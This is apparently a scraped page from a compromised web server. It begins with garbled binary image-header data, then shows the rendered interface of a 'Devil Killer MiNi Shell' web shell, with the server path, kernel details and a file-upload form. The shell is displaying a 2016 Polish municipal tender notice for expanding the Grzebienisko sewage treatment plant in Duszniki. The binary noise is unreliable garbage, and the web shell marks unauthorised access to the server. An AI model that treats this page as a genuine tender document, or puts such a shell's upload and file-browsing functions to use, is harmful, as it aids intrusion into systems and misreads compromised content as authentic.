JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160617/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160617/92471-N-2016.html

<p class="kh_header"><b>Duszniki: Rozbudowa i remont oczyszczalni ścieków w Grzebienisku</b><br>
<b>Numer ogłoszenia: 92471 - 2016; data zamieszczenia: 17.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Duszniki , ul. Sportowa 1, 64-550 Duszniki, woj. wielkopolskie, tel. 61 2919075, 2919400, faks 61 2919131.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.duszniki.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa i remont oczyszczalni ścieków w Grzebienisku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Oczyszczalnia ścieków w Grzebienisku jest obiektem istniejącym o przepustowości 180 m sześc./d, który ma zostać poddany rozbudowie i remontowi w celu uzyskania docelowej wydajności 550 m sześc./d, zapewniającej odbiór ścieków z jej obecnej i planowanej zlewni. Oczyszczalnia oczyszczać będzie zarówno ścieki napływające z kanalizacji sanitarnej jak i ścieki dowożone taborem asenizacyjnym.
W trakcie rozbudowy i remontu obiektów istniejąca  oczyszczalnia będzie eksploatowana.
Przedmiotem  zamówienia publicznego jest rozbudowa i remont mechaniczno-biologicznej oczyszczalni ścieków wraz z budową komory kraty taśmowo-panelowej, pompowni ścieków, budynku stopnia mechanicznego, punktu zlewnego ścieków dowożonych, dwóch reaktorów biologicznych żelbetowych zblokowanych z osadnikami wtórnymi, zbiornika tlenowej stabilizacji posadu wraz 
z zagęszczeniem grawitacyjnym.  Remont obejmuje zbiornik ścieków dowożonych oraz remont budynku technologiczno-socjalnego.

Zakres  rozbudowy i remontu oczyszczalni  obejmuje :
I.W ciągu układu technologicznego  następujące obiekty :
1.	Komorę rozdziału ścieków surowych 
2.	Komorę kraty panelowo-taśmowej 
3.	Pompownię główną 
4.	Stopień mechanicznego oczyszczania ścieków - krato piaskownik + płuczka piasku 
5.	Zbiornik retencyjny (adaptowany)
6.	Kontenerową stację zlewną 
7.	Reaktory biologiczne z osadnikami pionowymi 
8.	Halę technologiczną ze stacją pomp oraz dmuchaw 
9.	Zbiornik tlenowej stabilizacji osadu 
10.	Węzeł odwadniania osadu z prasą taśmową  .
Ponadto w zakresie zadania jest wykonanie dróg i placów oraz remont budynku 
socjalno-technologicznego

II. Branża konstrukcyjna obejmuje następujące obiekty:
1.	Reaktory z budynkiem technologicznym,
2.	Zbiornik stabilizacji osadu z komorą zasuw,
3.	Budynek mechanicznej stacji oczyszczania ścieków, 
4.	Płyta fundamentowa stacji zlewnej,
5.	Fundament pod silos wapna,
6.	Wiata dmuchaw,
7.	Istniejący zbiornik uśredniający,
8.	Istniejący budynek technologiczny - remont.
III. Branża elektryczna i AKPiA swym zakresem obejmuje:
1.	Zewnętrzną instalację oświetleniową obiektu oczyszczalni,
2.	Zewnętrzne trasy kablowe zasilania oraz komunikacyjne,
3.	Wewnętrzne instalacje budynków technologicznych,
4.	Rozdzielnice obiektowe,
5.	Wykonanie przebudowy zasilania oczyszczalni ścieków,
6.	Wykonanie  zasilania rezerwowego.
IV. Wykonanie rozruchu technologicznego i uzyskanie wyników oczyszczonych ścieków spełniających wymogi jakości odprowadzanych ścieków  określone w rozporządzeniu Ministra Środowiska  z dnia 18 listopada 2014 r. w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego ( Dz. U. z 2014 r.,poz,1800).

V. Uzyskanie dla Zamawiającego pozwolenia na użytkowanie obiektu.

Do ceny oferty należy doliczyć następujące koszty :  robót przygotowawczych, wykończeniowych  
i porządkowych, zorganizowania, zagospodarowania i późniejszej likwidacji placu rozbudowy, utrzymania zaplecza budowy, wywozu nadmiaru gruntu, ewentualnej wymiany gruntu, wywozu materiałów z rozbiórki i opłat wysypiskowych, zagęszczenia gruntu, pełnej obsługi geodezyjnej wraz z  inwentaryzacją powykonawczą, planu bezpieczeństwa i  ochrony zdrowia, wykonania dokumentacji powykonawczej, koszty związane z odbiorem wykonanych robót i innych czynności niezbędnych do wykonania przedmiotu zamówienia.
Zamawiający wymagał będzie  od Wykonawcy udzielenia  minimum 36 miesięcznej gwarancji  jakości 
i rękojmi za wady od dnia podpisania przez obie strony protokołu końcowego.  Jeżeli na poszczególne materiały lub urządzenia udzielona jest gwarancja producenta na okres dłuższy niż ten zaproponowany w ofercie, okres gwarancji udzielonej przez Wykonawcę odpowiada okresowi gwarancji udzielonej przez producenta.
Roboty  należy wykonać zgodnie z przepisami ustawy z dnia 07 lipca 1994 r. Prawo budowlane (Dz.U. z 2013 r. , poz.1409 z późn. zm ) oraz zgodnie z polskimi normami, sztuka budowlaną, a  użyte materiały powinny spełniać wymogi określone w art. 10 prawa budowlanego i STWiOR..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.25.21.00-9, 45.25.22.00-0, 45.25.21.40-1, 45.33.10.00-6, 45.33.22.20-0, 45.21.00.00-2, 45.22.20.00-9, 45.22.30.00-6, 45.26.00.00-7, 45.11.11.00-9, 45.23.11.10-9, 45.23.13.00-8, 45.31.10.00-0, 45.31.61.00-6, 45.31.71.00-3, 45.31.73.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium  w wysokości   100.000,00 zł  (sto tysięcy złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań 
w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnianie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- W celu oceny spełniania przez Wykonawcę warunków w zakresie posiadania wiedzy i doświadczenia Wykonawca przedstawi dokumenty:  wykaz najważniejszych robót budowlanych  wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania wraz z załączeniem dowodów dotyczących tych robót określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej
 i prawidłowo ukończone. 

Na potwierdzenie spełniania warunku w zakresie wiedzy i doświadczenia w wykaz  najważniejszych robót budowlanych wykonanych przez  Wykonawcę powinien  zawierać   roboty budowlane  polegające na  budowie , rozbudowie lub przebudowie oczyszczalni ścieków opartej o technologię osadu czynnego,  o przepustowości  średniej co najmniej 500 m3 na dobę   i   wartości nie mniejszej jak 3 mln  zł  wraz z załączeniem dowodu określającego, czy roboty te zostały wykonane  w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Dowodami dotyczącymi najważniejszych robót, określającymi, czy roboty te zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone jest poświadczenie inwestora  lub inny dokument, jeżeli 
z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnianie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca  wykaże, że dysponuje lub będzie dysponował  na czas realizacji zamówienia osobami zdolnymi wykonać zamówienie, tj. posiadającymi następujące doświadczenie i kwalifikacje. Zamawiający nie dopuszcza łączenia ról. Wykonawca składa oświadczenie wraz z dokumentami , tj.
Niezbędne doświadczenie i kwalifikacje :
1. kierownika budowy  w zakresie branży konstrukcyjno - budowlanej posiadającego co najmniej 3-letnie doświadczenie zawodowe ( w tym 24 miesięczne  faktyczne uczestnictwo)
 w kierowaniu  robotami budowlanymi potwierdzone przez  inwestorów,
2. kierownika robót instalacyjnych wod-kan, wentylacyjnych  posiadającego co najmniej 3-letnie doświadczenie zawodowe ( w tym 24 miesięczne  faktyczne uczestnictwo) w kierowaniu  robotami instalacyjnymi potwierdzone przez  inwestorów,
3.kierownika robót elektrycznych posiadającego co najmniej 3-letnie doświadczenie zawodowe ( w tym 24 miesięczne  faktyczne uczestnictwo) w kierowaniu  robotami elektrycznymi potwierdzone przez  inwestorów,
 wg wzoru w SIWZ - zał. Nr 6</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań 
w zakresie spełniania tego warunku. Wykonawca  potwierdza spełnianie warunku poprzez złożenie oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)  W przypadku zastosowania urządzeń zamiennych do wymienionych w dokumentacji projektowej należy na etapie składania oferty przetargowej udowodnić równoważność zaproponowanych urządzeń, w tym celu Wykonawca powinien dostarczyć wraz z opisem technicznym kartę katalogową proponowanego urządzenia z wyszczególnieniem typu który zamierza zaproponować, dokumentację techniczno - ruchową urządzenia oraz co najmniej 1 referencję potwierdzoną przez Użytkownika, z co najmniej 3 letnim okresem pracy danego urządzenia .
       2) W przypadku urządzeń do mechanicznego oczyszczania ścieku należy przedstawić kartę charakterystyki udowadniającą, iż dobrano napędy z zapasem wydajności min 50% - (chcemy uniknąć sytuacji w której tańsze zamienniki będą bardziej energochłonne ) prędkość obrotu wszystkich spirali bezwałowych powinna być nie większa niż 12 obr/min jest to podyktowane tym , iż żywotność przenośnika bezwałowego skraca się im więcej ma obrotów, spirala w połączeniu z elementem ciernym jakim jest wykładzina wyciera się, przy 12 obr/min żywotność spirali wynosi 7-8 lat.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca :
1.	składa ofertę  na formularzu wg wzoru podanego w SIWZ - zał. nr 2  oraz przedkłada :
2.	 Harmonogram rzeczowo- terminowo- finansowy  wg wzoru zał.nr 3 SIWZ 
3.	dokumenty  potwierdzające posiadanie pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych,
4.	w przypadku, gdy Wykonawca będzie dysponował zasobami innych podmiotów przedstawia Zamawiającemu  pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia  oraz wypełnia  załącznik nr 7 SIWZ
        5.   informację o częściach zamówienia, której wykonanie zamierza powierzyć podwykonawcy wg 
               wzoru zał. nr  8 i 9 SIWZ
        6. jeśli Wykonawca zaproponuje  urządzenia  równoważne dostarcza opisy wg wymagań pkt. IV.7. 
            SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Termin gwarancji - 10</li>
<li>3 - Termin usunięcia usterki - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia treści niniejszej umowy, wymagają aneksu sporządzonego 
z zachowaniem formy pisemnej pod rygorem nieważności.
2.	Poza istotnymi przypadkami wymienionymi w umowie, zgodnie z art.144 ust.1 ustawy Pzp przewiduje się możliwość dokonania istotnych zmian postanowień umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy i dotyczących :

            1) technologii wykonania robót budowlanych, sposobu i zakresu wykonania przedmiotu umowy 
                w przypadku wystąpienia okoliczności  uzasadnionych zmian w zakresie sposobu lub zakresu 
                 wykonania przedmiotu umowy w przypadku konieczności zrealizowania jakiejkolwiek 
               części robót, objętej przedmiotem umowy, przy zastosowaniu odmiennych rozwiązań
               technicznych lub technologicznych, niż wskazane w dokumentacji, a wynikających ze 
               stwierdzonych wad tej dokumentacji lub zmiany stanu prawnego w oparciu, o który je 
               przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło  niewykonaniem lub 
               nienależytym wykonaniem przedmiotu umowy,
           2)konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań 
               technicznych lub materiałowych ze względu na zmiany obowiązującego prawa 
               umowy, 
           3) zmiany sposobu spełnienia świadczenia na skutek zmian technologicznych spowodowanych
               w szczególności następujących okolicznościami: pojawienia się na  rynku materiałów lub 
               urządzeń nowszej generacji pozwalający na zaoszczędzenie  kosztów realizacji przedmiotu 
               umowy lub kosztów eksploatacji lub lepszej jakości  robót lub zwiększenia bezpieczeństwa
           4) zmiana podwykonawców lub dalszych podwykonawców  przy pomocy, których  Wykonawca 
               realizuje przedmiot umowy,   po akceptacji   Zamawiającego - jeżeli  zmiana taka nie wpłynie 
               na warunki realizacji przedmiotu umowy.  
           5) wystąpią ważne okoliczności niezależne od Wykonawcy skutkujące potrzebą zmiany
               terminu  realizacji zamówienia, o których mowa w § 6 ust. 2 
          6) zmiany stawki podatku VAT,
          7) zmiany sposobu rozliczania umowy lub dokonywania płatności na rzecz Wykonawcy 
               na skutek zawartej umowy przez Zamawiającego  o dofinansowanie  tego zadania ze 
               źródeł zewnętrznych
          8) udzielenie zamówień dodatkowych lub uzupełniających określonych w przepisach ustawy Pzp.

3.	Zgodnie z art. 142 ust 5 pzp wysokość wynagrodzenia Wykonawcy może zostać odpowiednio
       zmieniona w przypadku: 
    1)  zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie art. 2 ust. 
         3 - 5 ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę. 
    2) zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniom   zdrowotnym lub 
         wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, 
    3)  zmiany stawki podatku od towarów i usług   
	
4.	Zmiana wynagrodzenia może nastąpić, jeżeli zmiany wymienione w ust. 3 będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. 
5.	Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. 
6.	Strona umowy, która występuje z propozycją zmiany umowy zobowiązana jest do sporządzenia i uzasadnienia wniosku o taka zmianę. W przypadku wniosku o zmianę wynagrodzenia, z przyczyn o których mowa w ust. 3, strona wnioskująca zobowiązana jest przedstawić analizę w jaki sposób zmiany wpływają na koszt wykonania zamówienia przez Wykonawcę</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.duszniki.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Duszniki, ul. Sportowa 1, 64-550 Duszniki i na stronie internetowej.</p>
